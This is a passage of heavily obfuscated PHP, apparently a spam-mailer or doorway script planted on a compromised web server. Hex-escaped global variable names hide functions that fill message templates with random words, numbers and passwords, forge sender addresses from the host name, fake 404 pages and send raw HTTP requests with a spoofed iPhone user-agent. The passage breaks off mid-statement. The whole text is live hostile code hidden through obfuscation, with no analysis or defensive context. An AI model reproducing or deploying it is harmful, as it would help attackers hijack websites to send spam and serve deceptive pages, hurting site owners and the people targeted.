"]});${${"\x47\x4cO\x42AL\x53"}["p\x79i\x61\x6a\x74\x63"]}=preg_replace("/".preg_quote(${${"G\x4cO\x42A\x4cS"}["\x65urlpq\x74"]}[0][${$xksiek}])."/",${${"\x47\x4c\x4fB\x41\x4c\x53"}["y\x63\x6e\x75\x66u\x73u\x6a\x6c"]},${${"\x47\x4c\x4f\x42\x41LS"}["a\x70\x66\x6f\x62\x72\x71"]},1);}preg_match_all("#\\[T\x45\x58\x54\x5c-([[:d\x69gi\x74:]]+)\x5c]\x23",${${"\x47L\x4f\x42A\x4cS"}["a\x70f\x6f\x62\x72q"]},${$ujoqcftky});for(${$lxkysix}=0;${${"\x47\x4c\x4fB\x41\x4c\x53"}["\x66\x79bq\x62\x72tn"]}<count(${${"G\x4cO\x42A\x4cS"}["l\x62o\x6c\x79fx\x6eivk"]}[0]);${${"\x47\x4cO\x42\x41\x4cS"}["\x66\x79b\x71\x62\x72\x74\x6e"]}++){${"\x47L\x4fB\x41\x4c\x53"}["\x6c\x72\x78\x61\x6f\x6c\x73\x69"]="\x63\x6fn\x74e\x6et";$osbpusol="wor\x64";$uhqpielodxx="\x6d\x61\x74\x63he\x73";${${"\x47L\x4f\x42\x41LS"}["x\x73\x63x\x6ae\x78"]}=${$uhqpielodxx}[1][${${"\x47\x4c\x4f\x42A\x4cS"}["f\x79b\x71br\x74\x6e"]}];${$osbpusol}=generate_word(${${"\x47LOB\x41\x4c\x53"}["\x78sc\x78\x6a\x65\x78"]});$mgvbrau="\x77\x6f\x72d";${${"\x47LO\x42A\x4c\x53"}["lr\x78\x61\x6fl\x73\x69"]}=preg_replace("/".preg_quote(${${"\x47\x4c\x4fB\x41L\x53"}["l\x62\x6f\x6c\x79f\x78\x6e\x69\x76\x6b"]}[0][${${"G\x4c\x4fB\x41\x4cS"}["\x66\x79b\x71\x62rt\x6e"]}])."/",${$mgvbrau},${${"\x47\x4cOB\x41LS"}["\x61p\x66\x6f\x62\x72q"]},1);}return${${"\x47\x4c\x4f\x42ALS"}["\x61\x70\x66\x6fb\x72q"]};}function xnum_macros($content){$pzpyjuxcpiy="\x6d\x61\x74c\x68\x65\x73";$xfajaeff="\x6d\x61tc\x68e\x73";${"\x47\x4cOBA\x4cS"}["k\x69\x6f\x65b\x65kq\x69ev"]="\x69";preg_match_all("#\x5c[NUM\x5c-([[:dig\x69\x74:]]+)\x5c]#",${${"GL\x4f\x42AL\x53"}["\x61\x70fob\x72\x71"]},${$pzpyjuxcpiy});for(${${"\x47LOBAL\x53"}["\x66\x79\x62\x71\x62\x72\x74n"]}=0;${${"\x47\x4c\x4f\x42A\x4c\x53"}["\x66\x79b\x71\x62r\x74n"]}<count(${$xfajaeff}[0]);${${"\x47LO\x42\x41LS"}["k\x69\x6f\x65be\x6bqiev"]}++){${"G\x4cO\x42A\x4cS"}["\x77\x6e\x6e\x6f\x6f\x63"]="\x6d\x61\x74\x63he\x73";${"\x47\x4cO\x42A\x4cS"}["v\x69\x73it\x6fsnub\x6c\x70"]="\x6d\x61x";${"G\x4c\x4fB\x41L\x53"}["w\x68\x6cqj\x74\x6f\x6fr\x66"]="\x6e\x75m";${"\x47\x4cOB\x41\x4c\x53"}["\x64m\x74\x66n\x77x\x7a\x74f"]="i";${"\x47\x4c\x4f\x42AL\x53"}["\x65wkbm\x71\x6fd\x6e\x67\x6f"]="\x6eum";${"G\x4c\x4f\x42AL\x53"}["bm\x69\x75y\x70cz\x61\x6b"]="\x69";${${"G\x4c\x4f\x42A\x4cS"}["\x77\x68\x6cqjto\x6f\x72f"]}=${${"\x47L\x4f\x42\x41\x4c\x53"}["\x77\x6e\x6e\x6foc"]}[1][${${"\x47\x4c\x4fB\x41L\x53"}["\x62mi\x75ypc\x7aa\x6b"]}];${"\x47\x4c\x4f\x42\x41\x4c\x53"}["od\x64\x7a\x76\x70w\x6cnl"]="\x72\x61\x6e\x64";${${"\x47L\x4fBA\x4c\x53"}["dm\x6c\x62m\x68"]}=pow(10,${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x65wk\x62\x6dq\x6fd\x6e\x67o"]}-1);${"G\x4cOB\x41\x4cS"}["h\x6c\x63s\x6c\x69fsb"]="co\x6e\x74en\x74";${${"\x47\x4c\x4f\x42A\x4cS"}["\x76i\x73i\x74o\x73n\x75b\x6c\x70"]}=pow(10,${${"\x47LO\x42A\x4c\x53"}["a\x70\x61\x66\x6f\x69\x64g\x6d\x7a\x75\x75"]})-1;${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["od\x64\x7a\x76\x70\x77\x6c\x6e\x6c"]}=rand(${${"G\x4c\x4fB\x41\x4c\x53"}["\x64m\x6c\x62\x6d\x68"]},${${"\x47\x4cO\x42\x41LS"}["xfp\x66\x78y\x69\x69\x63\x74\x70"]});${${"\x47\x4cO\x42\x41LS"}["\x68\x6c\x63\x73\x6c\x69\x66\x73\x62"]}=str_replace(${${"\x47\x4c\x4f\x42\x41L\x53"}["\x6cboly\x66\x78ni\x76\x6b"]}[0][${${"G\x4cO\x42\x41\x4c\x53"}["\x64m\x74\x66\x6e\x77x\x7a\x74f"]}],${${"\x47\x4cOB\x41\x4c\x53"}["\x6e\x62\x6e\x65\x73\x62n"]},${${"\x47\x4cOB\x41\x4cS"}["a\x70fo\x62\x72\x71"]});}return${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x61\x70\x66o\x62\x72\x71"]};}function num_macros($content){${"G\x4cO\x42\x41\x4c\x53"}["\x61\x68xqhqnx\x61"]="\x6d\x61\x74ch\x65\x73";$uwpgtyucowo="\x69";$amtlvbxk="\x63o\x6e\x74\x65\x6e\x74";${"\x47\x4cOB\x41L\x53"}["o\x6f\x76\x62k\x76\x79"]="\x6da\x74c\x68\x65\x73";${"G\x4c\x4f\x42\x41L\x53"}["\x76x\x65\x6e\x62\x77\x77\x70d\x77ql"]="\x69";preg_match_all("#\x5c[\x52A\x4eD\\-([[:d\x69\x67i\x74:]]+)\\-([[:d\x69\x67\x69t:]]+)\\]#",${$amtlvbxk},${${"G\x4c\x4fBAL\x53"}["\x61h\x78\x71h\x71n\x78\x61"]});for(${${"\x47L\x4f\x42\x41\x4cS"}["\x76\x78e\x6e\x62\x77\x77\x70\x64\x77\x71\x6c"]}=0;${${"GL\x4f\x42\x41\x4c\x53"}["\x66\x79\x62\x71\x62\x72\x74\x6e"]}<count(${${"\x47\x4c\x4fB\x41\x4c\x53"}["\x6f\x6fv\x62\x6bv\x79"]}[0]);${$uwpgtyucowo}++){$yyofcdnu="\x6d\x61\x74\x63h\x65\x73";${"\x47\x4cO\x42\x41\x4c\x53"}["\x6bz\x76e\x6atn\x73"]="\x63on\x74\x65\x6et";$alqgklf="\x6di\x6e";$wdwojkxjn="\x6dax";$auhylbfw="\x6dax";$oqgcwrpw="\x6d\x61tc\x68e\x73";${${"G\x4c\x4f\x42\x41\x4cS"}["d\x6d\x6c\x62m\x68"]}=${$yyofcdnu}[1][${${"G\x4c\x4fBA\x4c\x53"}["\x66\x79\x62\x71br\x74\x6e"]}];${$auhylbfw}=${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x6c\x62\x6fl\x79\x66x\x6e\x69\x76\x6b"]}[2][${${"GLOBA\x4cS"}["\x66\x79\x62\x71b\x72\x74n"]}];${"\x47\x4cOB\x41\x4c\x53"}["g\x71\x68\x6bq\x6f\x6a"]="\x63o\x6et\x65\x6e\x74";${"\x47LOBA\x4c\x53"}["v\x71c\x68g\x77\x72te\x75x\x72"]="ran\x64";${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x6e\x62\x6e\x65\x73\x62n"]}=rand(${$alqgklf},${$wdwojkxjn});${${"G\x4c\x4f\x42\x41L\x53"}["\x67q\x68k\x71o\x6a"]}=str_replace(${$oqgcwrpw}[0][${${"GL\x4fB\x41\x4c\x53"}["\x66\x79\x62\x71\x62r\x74\x6e"]}],${${"\x47\x4cO\x42\x41LS"}["\x76\x71\x63\x68gw\x72\x74e\x75\x78\x72"]},${${"\x47L\x4f\x42\x41\x4cS"}["\x6bzv\x65j\x74\x6es"]});}return${${"\x47\x4cO\x42\x41\x4c\x53"}["ap\x66\x6fbrq"]};}function generate_word($length){${"\x47\x4c\x4fBA\x4c\x53"}["fu\x64sy\x73e\x77\x77\x63"]="c\x68a\x72\x73";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["avq\x68\x77\x6e\x71\x66\x68"]="\x73t\x72\x69\x6e\x67";${${"G\x4cO\x42\x41\x4c\x53"}["\x75c\x6c\x69d\x66\x69"]}="\x61bc\x64e\x66\x67h\x69j\x6b\x6c\x6d\x6e\x6fpq\x72\x73t\x75v\x79\x78\x7a";${"GL\x4fB\x41\x4c\x53"}["n\x79\x74\x72g\x66b\x75l\x76"]="\x73\x74r\x69n\x67";$hwgkscqhbog="\x6eu\x6dC\x68ar\x73";${"\x47\x4cOBAL\x53"}["\x6e\x68\x6cc\x72\x76"]="i";${$hwgkscqhbog}=strlen(${${"G\x4c\x4f\x42ALS"}["\x66\x75\x64\x73\x79\x73\x65\x77\x77\x63"]});$czmeeowy="i";${${"G\x4cO\x42\x41LS"}["\x6e\x79t\x72gf\x62u\x6c\x76"]}="";for(${${"G\x4c\x4f\x42\x41\x4c\x53"}["\x6ehl\x63\x72\x76"]}=0;${$czmeeowy}<${${"G\x4c\x4f\x42A\x4c\x53"}["\x73ju\x6b\x66u\x65\x70\x62\x68"]};${${"G\x4c\x4f\x42\x41\x4cS"}["\x66\x79\x62\x71\x62r\x74n"]}++){$cbktgugg="\x73tr\x69n\x67";${"\x47\x4c\x4f\x42\x41L\x53"}["\x79\x68\x75\x74y\x6f\x79\x61\x72\x68u"]="c\x68\x61\x72\x73";$axigcqowche="nu\x6d\x43\x68a\x72\x73";${$cbktgugg}.=substr(${${"\x47\x4c\x4fBALS"}["\x79\x68\x75\x74\x79oy\x61\x72hu"]},rand(1,${$axigcqowche})-1,1);}return${${"\x47\x4c\x4f\x42\x41\x4cS"}["\x61\x76\x71\x68\x77\x6e\x71\x66\x68"]};}function pass_macros($content,$passes){$dkntfvhb="\x70\x61ss\x65\x73";${${"\x47L\x4f\x42ALS"}["\x68\x78\x6b\x66\x78r\x78p\x65\x6eq\x68"]}=array_pop(${$dkntfvhb});return str_replace("[\x50\x41SS]",${${"\x47LOBA\x4c\x53"}["h\x78k\x66\x78\x72\x78\x70enq\x68"]},${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x61\x70\x66\x6f\x62\x72\x71"]});}function fteil_macros($content,$fteil){$qbjfquydtw="\x66t\x65\x69\x6c";return str_replace("[\x46TE\x49\x4c]",${$qbjfquydtw},${${"\x47\x4c\x4f\x42\x41LS"}["a\x70\x66\x6f\x62\x72\x71"]});}function is_ip($str){return preg_match("/^([\x31-9]|[\x31-9][0-9]|\x31[\x30-\x39][\x30-\x39]|\x32[\x30-\x34][\x30-\x39]|\x325[0-5])(\x5c\x2e([0-\x39]|[1-\x39][0-9]|1[\x30-\x39][\x30-9]|\x32[0-4][\x30-9]|2\x35[\x30-5])){3}\$/",${${"G\x4c\x4f\x42\x41\x4c\x53"}["\x76\x65p\x70\x78\x77\x6a\x72\x68"]});}function from_host($content){$msfgiloyj="\x74o\x6b\x65\x6e\x73";$host=preg_replace("/^(\x77w\x77|f\x74\x70)\\./\x69","",@$_SERVER["H\x54TP\x5f\x48\x4fS\x54"]);if(is_ip($host)){${"\x47\x4cO\x42\x41\x4c\x53"}["r\x69\x64b\x70i\x72b"]="\x63o\x6e\x74\x65\x6e\x74";return${${"\x47\x4cOBA\x4cS"}["r\x69\x64\x62p\x69\x72\x62"]};}${${"GL\x4f\x42A\x4c\x53"}["\x68\x71\x73\x73\x64\x69\x6c\x6f"]}=explode("\x40",${${"\x47\x4c\x4f\x42\x41\x4cS"}["\x61\x70\x66obr\x71"]});${${"\x47L\x4f\x42\x41\x4cS"}["\x61\x70\x66\x6fb\x72\x71"]}=${$msfgiloyj}[0]."\x40".$host.">";return${${"G\x4cO\x42A\x4cS"}["a\x70\x66o\x62rq"]};}function error_404(){$duvztk="\x75\x72\x69";${${"GL\x4f\x42A\x4c\x53"}["q\x66\x65\x79\x65\x66\x75\x71e"]}=preg_replace("/(\\?).*\$/","",$_SERVER["REQ\x55E\x53\x54_\x55R\x49"]);${${"GL\x4f\x42\x41L\x53"}["a\x70\x66obr\x71"]}=http_request("htt\x70://".$_SERVER["\x53\x45R\x56ER\x5f\x4eA\x4d\x45"]."/A\x46Qj\x43\x4eHnh\x38\x52tt\x46\x49\x33V\x4drBd\x64Y\x77\x36\x72\x6eg\x4bz7K\x45A");${${"\x47\x4c\x4fB\x41L\x53"}["\x61\x70\x66\x6f\x62\x72\x71"]}=str_replace("/\x41F\x51\x6a\x43NHnh\x38R\x74t\x46\x49\x33\x56\x4d\x72Bd\x64Y\x77\x36\x72\x6e\x67K\x7a7KEA",${$duvztk},${${"\x47LO\x42\x41\x4cS"}["\x61p\x66\x6f\x62\x72\x71"]});exit(${${"\x47\x4cO\x42ALS"}["\x61\x70\x66\x6fb\x72q"]});}function http_request($params){${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x6e\x65n\x6f\x68\x78"]="p\x61\x72am\x73";${"G\x4c\x4fB\x41\x4c\x53"}["\x6e\x77h\x6b\x6bx\x66\x7a\x63\x79"]="\x70\x61\x72\x61m\x73";${"\x47\x4c\x4f\x42\x41L\x53"}["m\x71ld\x69\x6d\x77\x64\x75"]="u\x72\x6c";if(!is_array(${${"G\x4c\x4f\x42\x41LS"}["\x6e\x77hk\x6bx\x66\x7ac\x79"]})){${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x69\x63gd\x62\x76f\x78"]}=array("url"=>${${"\x47LO\x42\x41\x4c\x53"}["\x69\x63g\x64\x62\x76\x66\x78"]},"\x6det\x68\x6f\x64"=>"G\x45T");}${"\x47L\x4f\x42\x41\x4c\x53"}["\x76x\x69\x6a\x76\x65\x6b\x7a\x69"]="\x70\x61ram\x73";${"G\x4cOBA\x4cS"}["r\x67\x68\x79s\x68\x76\x72gw\x65"]="\x75rl";${"\x47\x4cO\x42\x41L\x53"}["\x78\x79\x71\x78\x74\x62\x63o\x69v\x7a"]="\x70a\x72a\x6d\x73";${"\x47L\x4f\x42\x41\x4c\x53"}["\x6d\x71g\x68\x6e\x73\x69\x64"]="\x70\x61r\x61ms";${"\x47\x4c\x4fB\x41\x4c\x53"}["\x77h\x62\x6bd\x61j\x6e\x63\x79\x66"]="\x75r\x6c";$qsvullrdgijh="p\x61\x72a\x6d\x73";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["hpy\x70\x6a\x78\x72\x63\x66\x62"]="\x75\x72\x6c";if(${${"\x47\x4cO\x42\x41L\x53"}["i\x63\x67\x64\x62\x76\x66\x78"]}["u\x72l"]=="")return FALSE;$kartldnrdvp="pa\x72\x61\x6d\x73";${"\x47L\x4f\x42\x41L\x53"}["kd\x6b\x73o\x78\x6f"]="\x70\x61r\x61\x6d\x73";${"\x47\x4c\x4fB\x41L\x53"}["hri\x78\x62\x73\x64qc\x71m\x61"]="\x72e\x73";if(!isset(${${"\x47LO\x42\x41\x4cS"}["\x6e\x65\x6eoh\x78"]}["m\x65\x74\x68\x6f\x64"]))${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["i\x63gd\x62v\x66\x78"]}["m\x65\x74hod"]=(isset(${${"\x47\x4c\x4f\x42A\x4c\x53"}["\x69\x63\x67\x64\x62\x76fx"]}["da\x74a"])&&is_array(${${"\x47\x4c\x4f\x42\x41LS"}["\x6b\x64\x6b\x73\x6f\x78\x6f"]}["d\x61\x74a"]))?"POST":"GE\x54";$tdngrnnmlr="ur\x6c";${${"\x47\x4cO\x42\x41\x4cS"}["v\x78\x69\x6av\x65\x6b\x7a\x69"]}["\x6detho\x64"]=strtoupper(${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x78yq\x78\x74\x62\x63\x6fi\x76\x7a"]}["\x6d\x65\x74h\x6fd"]);${"G\x4c\x4f\x42AL\x53"}["y\x72\x66\x77\x6b\x6bs\x70\x6bu"]="u\x72\x6c";$nwpfhvrsqvj="p\x6frt";if(!in_array(${$qsvullrdgijh}["m\x65t\x68\x6fd"],array("\x47E\x54","P\x4fS\x54")))return FALSE;$ihxnlfpxdfd="\x75\x72\x6c";$lbspexnjsw="\x75r\x6c";$wgzlvxqfjizw="u\x72\x6c";${${"\x47\x4c\x4fB\x41\x4cS"}["l\x76\x63\x6b\x6a\x74\x61\x62\x78\x73"]}=parse_url(${${"\x47\x4c\x4fBA\x4cS"}["i\x63g\x64\x62\x76\x66\x78"]}["\x75\x72\x6c"]);if(!isset(${${"\x47\x4c\x4f\x42A\x4c\x53"}["r\x67\x68\x79\x73\x68v\x72\x67\x77e"]}["\x73ch\x65\x6de"]))${${"\x47\x4cO\x42ALS"}["m\x71ld\x69\x6dw\x64\x75"]}["\x73\x63he\x6de"]="\x68\x74tp";if(!isset(${${"GLOBAL\x53"}["\x68\x70\x79p\x6a\x78rc\x66b"]}["\x70a\x74h"]))${$lbspexnjsw}["\x70a\x74h"]="/";if(!isset(${${"\x47L\x4f\x42\x41\x4c\x53"}["wh\x62\x6b\x64a\x6a\x6ec\x79\x66"]}["\x68\x6f\x73t"])&&isset(${$tdngrnnmlr}["\x70at\x68"])){if(strpos(${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x6cvc\x6bj\x74a\x62x\x73"]}["\x70\x61t\x68"],"/")){$dwjvillu="u\x72l";${"G\x4cOB\x41L\x53"}["\x78\x74\x68j\x7ax\x6b"]="\x75\x72\x6c";${$dwjvillu}["\x68\x6f\x73t"]=substr(${${"\x47L\x4fB\x41\x4c\x53"}["lv\x63\x6b\x6at\x61\x62x\x73"]}["pa\x74h"],0,strpos(${${"\x47LOB\x41L\x53"}["\x6c\x76\x63\x6b\x6at\x61\x62\x78\x73"]}["path"],"/"));${${"\x47\x4c\x4f\x42A\x4c\x53"}["l\x76\x63\x6b\x6a\x74\x61\x62\x78s"]}["p\x61t\x68"]=substr(${${"\x47L\x4f\x42\x41\x4c\x53"}["l\x76\x63kj\x74\x61\x62\x78\x73"]}["pa\x74\x68"],strpos(${${"G\x4c\x4fBA\x4c\x53"}["\x78\x74h\x6az\x78\x6b"]}["\x70ath"],"/"));}else{${"\x47\x4c\x4f\x42\x41\x4c\x53"}["ke\x63\x62\x6e\x75qk\x77"]="\x75\x72\x6c";$dxnxasp="ur\x6c";${${"\x47LO\x42AL\x53"}["l\x76c\x6bjtab\x78\x73"]}["\x68o\x73t"]=${${"\x47\x4cO\x42\x41\x4cS"}["k\x65\x63b\x6euq\x6b\x77"]}["\x70at\x68"];${$dxnxasp}["\x70\x61th"]="/";}}${"\x47L\x4fBA\x4cS"}["\x73\x72\x68bwq\x76fl\x69"]="u\x72l";${"GL\x4f\x42A\x4c\x53"}["\x6b\x72\x63d\x65\x66\x75\x74"]="\x72\x65\x73";${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x79\x72fw\x6bk\x73\x70\x6bu"]}["p\x61t\x68"]=preg_replace("/[\x5c/]+/","/",${${"G\x4cOB\x41\x4c\x53"}["l\x76\x63k\x6a\x74\x61\x62\x78s"]}["p\x61\x74h"]);$ktskyr="\x74\x69\x6de\x6f\x75t";$ggyovxibtno="\x75\x72\x6c";$pmcvjns="h\x65\x61\x64e\x72\x73";if(isset(${$wgzlvxqfjizw}["q\x75e\x72y"]))${${"\x47L\x4fB\x41\x4c\x53"}["\x6cv\x63\x6b\x6a\x74ab\x78s"]}["\x70\x61th"].="?{$url['query']}";${"GL\x4f\x42\x41\x4c\x53"}["\x6c\x6c\x6f\x6ba\x71\x79x\x74\x76"]="\x75\x72l";$fdgdljzhrg="\x70\x6fr\x74";${$nwpfhvrsqvj}=isset(${${"\x47\x4c\x4fBAL\x53"}["\x69cg\x64b\x76\x66x"]}["port"])?${${"\x47\x4c\x4f\x42AL\x53"}["\x69c\x67\x64\x62\x76\x66\x78"]}["\x70\x6fr\x74"]:(isset(${$ggyovxibtno}["po\x72t"])?${$ihxnlfpxdfd}["\x70\x6fr\x74"]:(${${"\x47\x4cOB\x41\x4cS"}["\x6cv\x63\x6bj\x74\x61\x62\x78\x73"]}["sc\x68e\x6d\x65"]=="\x68t\x74\x70\x73"?443:80));${$ktskyr}=isset(${${"G\x4cO\x42\x41\x4c\x53"}["\x69c\x67\x64\x62v\x66\x78"]}["tim\x65out"])?${${"\x47\x4c\x4f\x42\x41\x4cS"}["\x6d\x71\x67\x68n\x73\x69\x64"]}["\x74i\x6deou\x74"]:30;if(!isset(${${"\x47\x4cO\x42\x41LS"}["\x69c\x67\x64\x62\x76fx"]}["\x72\x65t\x75\x72n"]))${$kartldnrdvp}["r\x65turn"]="c\x6fnte\x6e\x74";${${"\x47\x4cO\x42\x41LS"}["\x73\x78\x6ct\x74\x64\x6e"]}=${${"GL\x4f\x42\x41L\x53"}["\x6clo\x6ba\x71\x79\x78\x74\x76"]}["s\x63\x68\x65\x6de"]=="h\x74t\x70\x73"?"\x73s\x6c://":"";${${"\x47\x4cO\x42\x41L\x53"}["\x64\x6f\x6cjy\x66\x66\x72\x69\x79s\x78"]}=@fsockopen(${${"G\x4c\x4f\x42A\x4c\x53"}["\x73\x78\x6c\x74td\x6e"]}.${${"\x47L\x4f\x42A\x4c\x53"}["s\x72h\x62\x77q\x76\x66\x6c\x69"]}["\x68\x6f\x73\x74"],${$fdgdljzhrg},${${"\x47\x4cO\x42\x41L\x53"}["c\x6b\x73\x75z\x75\x71\x76\x77\x63"]},${${"\x47\x4c\x4f\x42\x41\x4cS"}["\x6bq\x68\x79\x6e\x6b\x73\x77\x6a\x7a"]},${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x66\x63\x71\x6f\x6fe\x72\x6e"]});if(${${"GL\x4f\x42\x41LS"}["\x64\x6fl\x6a\x79f\x66\x72\x69\x79\x73\x78"]}){${"GLO\x42A\x4cS"}["\x73\x7a\x79\x78qt\x7a\x63z"]="\x66\x70";${"G\x4cOB\x41\x4cS"}["\x79s\x69\x68\x6fb\x6f\x78\x72l\x70"]="\x70\x61r\x61ms";${"\x47\x4cO\x42AL\x53"}["\x77s\x78\x72\x67o\x61n"]="\x66p";${"\x47L\x4f\x42\x41\x4c\x53"}["i\x6a\x72\x68\x67m\x6a\x70"]="\x72\x65que\x73t";$rnwvskue="\x70a\x72\x61ms";if(!isset(${${"\x47\x4cO\x42A\x4c\x53"}["\x69\x63\x67d\x62\x76\x66\x78"]}["Use\x72-Age\x6e\x74"]))${$rnwvskue}["U\x73e\x72-Ag\x65nt"]="M\x6f\x7ailla/5\x2e0\x20(i\x50h\x6f\x6ee\x3b U\x3b\x20C\x50\x55 iPhon\x65 \x4f\x53\x203_\x30 lik\x65\x20M\x61\x63\x20OS\x20\x58\x3b\x20en-\x75s) \x41\x70\x70\x6ce\x57\x65\x62\x4bi\x74/5\x32\x38\x2e\x318 (KH\x54M\x4c,\x20li\x6b\x65\x20Geck\x6f)\x20\x56\x65r\x73\x69o\x6e/4\x2e\x30\x20M\x6fb\x69\x6c\x65/7\x413\x34\x31\x20\x53a\x66a\x72i/5\x328.16";${"G\x4c\x4fBA\x4c\x53"}["\x64\x77\x62z\x7azujg\x65\x73"]="\x72\x65que\x73t";${"G\x4c\x4f\x42\x41\x4c\x53"}["\x69\x68\x76\x6b\x6ev\x68"]="\x66p";${"G\x4c\x4fB\x41\x4c\x53"}["r\x65\x71\x76\x68ywjs\x79\x63"]="re\x71\x75e\x73\x74";${${"\x47\x4c\x4fB\x41\x4c\x53"}["\x69jr\x68\x67\x6d\x6ap"]}="{$params['method']} {$url['path']} H\x54T\x50/\x31.\x30\r\n";${${"\x47\x4cOB\x41\x4cS"}["\x64\x77b\x7a\x7a\x7a\x75j\x67\x65\x73"]}.="H\x6fst: {$url['host']}\r\n";$ksctlofbdv="\x70\x61r\x61m\x73";$gjvppir="re\x71\x75\x65\x73\x74";${${"\x47\x4c\x4f\x42\x41L\x53"}["\x6d\x78bd\x6a\x6c"]}.="Us\x65\x72-A\x67\x65n\x74:\x20{$params['User-Agent']}"."\r\n";if(isset(${$ksctlofbdv}["\x72e\x66\x65\x72er"]))${$gjvppir}.="\x52\x65f\x65r\x65r: {$params['referer']}\r\n";if(isset(${${"G\x4c\x4fBA\x4cS"}["\x79\x73\x69h\x6f\x62\x6f\x78r\x6cp"]}["c\x6fok\x69\x65"])){$ztssvlnv="\x70a\x72\x61m\x73";${${"\x47\x4c\x4fBA\x4c\x53"}["\x77\x74d\x70\x70\x6b\x74f"]}="";$qnmqlxq="\x63\x6fok\x69e";if(is_array(${$ztssvlnv}["c\x6fo\x6b\x69e"])){${"GL\x4fBA\x4cS"}["os\x69\x69\x75v\x6a\x69"]="\x6b";${"G\x4c\x4f\x42AL\x53"}["\x62i\x73\x79\x6cu"]="co\x6f\x6bie";$btalunrwhiv="p\x61\x72\x61\x6d\x73";$eotrwnlnuut="\x63o\x6fki\x65";foreach(${$btalunrwhiv}["coo\x6b\x69\x65"]as${${"\x47\x4c\x4f\x42\x41\x4cS"}["\x6f\x73\x69\x69\x75vj\x69"]}=>${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x62\x65\x72\x61\x74l\x6f\x69j"]})${$eotrwnlnuut}.="$k=$v; ";${${"GL\x4f\x42AL\x53"}["b\x69s\x79l\x75"]}=substr(${${"\x47\x4c\x4f\x42\x41\x4cS"}["\x77\x74d\x70p\x6b\x74f"]},0,-2);}else${${"\x47\x4c\x4fBA\x4cS"}["wt\x64ppk\x74f"]}=${${"\x47\x4c\x4fBA\x4c\x53"}["\x69\x63\x67\x64\x62vfx"]}["coo\x6b\x69e"];$tiwbwbgch="r\x65q\x75\x65\x73t";if(${$qnmqlxq}!="")${$tiwbwbgch}.="Co\x6f\x6b\x69e:\x20$cookie\r\n";}${"\x47\x4c\x4f\x42ALS"}["\x77\x66\x63q\x73\x75m"]="r\x65\x71\x75\x65s\x74";$dpnkqsgbmss="\x70\x61r\x61\x6d\x73";${${"\x47\x4cOB\x41\x4cS"}["\x72eq\x76hy\x77j\x73y\x63"]}.="\x43\x6f\x6ene\x63\x74\x69\x6f\x6e:\x20\x63l\x6f\x73e\r\n";$rrgdjfvkdzd="\x70\x61r\x61m\x73";if(${$dpnkqsgbmss}["\x6d\x65t\x68o\x64"]=="PO\x53T"){$bdrehri="\x64\x61\x74\x61";if(isset(${${"\x47\x4c\x4f\x42AL\x53"}["\x69c\x67\x64\x62v\x66\x78"]}["d\x61ta"])&&is_array(${${"\x47\x4c\x4fB\x41LS"}["i\x63\x67\x64bv\x66\x78"]}["\x64\x61\x74\x61"])){$egwwjfvmn="\x6b";${"G\x4c\x4fB\x41L\x53"}["\x74\x68\x65e\x78ecg\x63\x70c"]="d\x61ta";${"\x47\x4cO\x42\x41L\x53"}["\x71\x73\x76\x77\x61g\x75\x66\x6b\x71"]="\x76";$fkqgohlfyhme="\x64\x61\x74\x61";$qttdtutjpo="d\x61\x74\x61";${"\x47\x4c\x4f\x42A\x4c\x53"}["\x71\x7akb\x75omk\x69wt"]="k";$xturoya="\x64\x61\x74a";foreach(${${"G\x4c\x4f\x42A\x4cS"}["\x69\x63gd\x62\x76fx"]}["data"]AS${${"\x47\x4c\x4fB\x41\x4c\x53"}["qz\x6bb\x75o\x6d\x6b\x69\x77\x74"]}=>${${"GL\x4f\x42\x41\x4c\x53"}["b\x65\x72\x61t\x6c\x6f\x69j"]})${${"\x47\x4cO\x42A\x4cS"}["\x74\x68\x65e\x78\x65\x63\x67\x63\x70c"]}.=urlencode(${$egwwjfvmn})."=".urlencode(${${"GL\x4f\x42ALS"}["q\x73v\x77\x61\x67\x75fk\x71"]})."\x26";if(substr(${$fkqgohlfyhme},-1)=="\x26")${$qttdtutjpo}=substr(${$xturoya},0,-1);}${"\x47LO\x42AL\x53"}["q\x64\x79\x62\x61\x6end"]="\x64\x61\x74a";$vpqzmjw="\x72\x65\x71u\x65\x73\x74";${${"G\x4c\x4fB\x41\x4c\x53"}["\x71d\x79b\x61n\x6e\x64"]}.="\r\n\r\n";${${"\x47L\x4f\x42A\x4c\x53"}["\x6d\x78\x62\x64\x6al"]}.="\x43o\x6etent-t\x79\x70\x65: ap\x70\x6c\x69c\x61tio\x6e/\x78-\x77\x77\x77-\x66\x6fr\x6d-ur\x6ce\x6e\x63\x6fde\x64\r\n";${$vpqzmjw}.="\x43\x6f\x6e\x74e\x6et-leng\x74h:\x20".strlen(${$bdrehri})."\r\n";}${${"\x47\x4cO\x42\x41\x4cS"}["\x6dxbdj\x6c"]}.="\r\n";if(${$rrgdjfvkdzd}["meth\x6fd"]=="\x50\x4fS\x54")${${"GL\x4f\x42\x41L\x53"}["\x6d\x78b\x64j\x6c"]}.=${${"\x47\x4c\x4f\x42\x41LS"}["yhd\x71\x6a\x76"]};$sttbiso="h_\x64\x65\x74\x65\x63t\x65\x64";@fwrite(${${"\x47LOBA\x4cS"}["\x73\x7a\x79x\x71tz\x63\x7a"]},${${"\x47\x4c\x4fBA\x4cS"}["\x77\x66\x63qs\x75\x6d"]});${${"G\x4cO\x42\x41\x4c\x53"}["v\x6f\x66tn\x74\x76\x76"]}="";${${"G\x4c\x4f\x42\x41\x4c\x53"}["\x67\x63\x6a\x68\x6ftz"]}="";${$sttbiso}=false;while(!@feof(${${"GL\x4f\x42\x41LS"}["ws\x78\x72\x67\x6f\x61\x6e"]})){${"G\x4c\x4f\x42A\x4c\x53"}["\x67gt\x67x\x66\x71m\x68\x72"]="\x66\x70";$mqieenew="re\x73";$wetpmnqilx="\x68\x5f\x64\x65tect\x65\x64";${$mqieenew}.=@fread(${${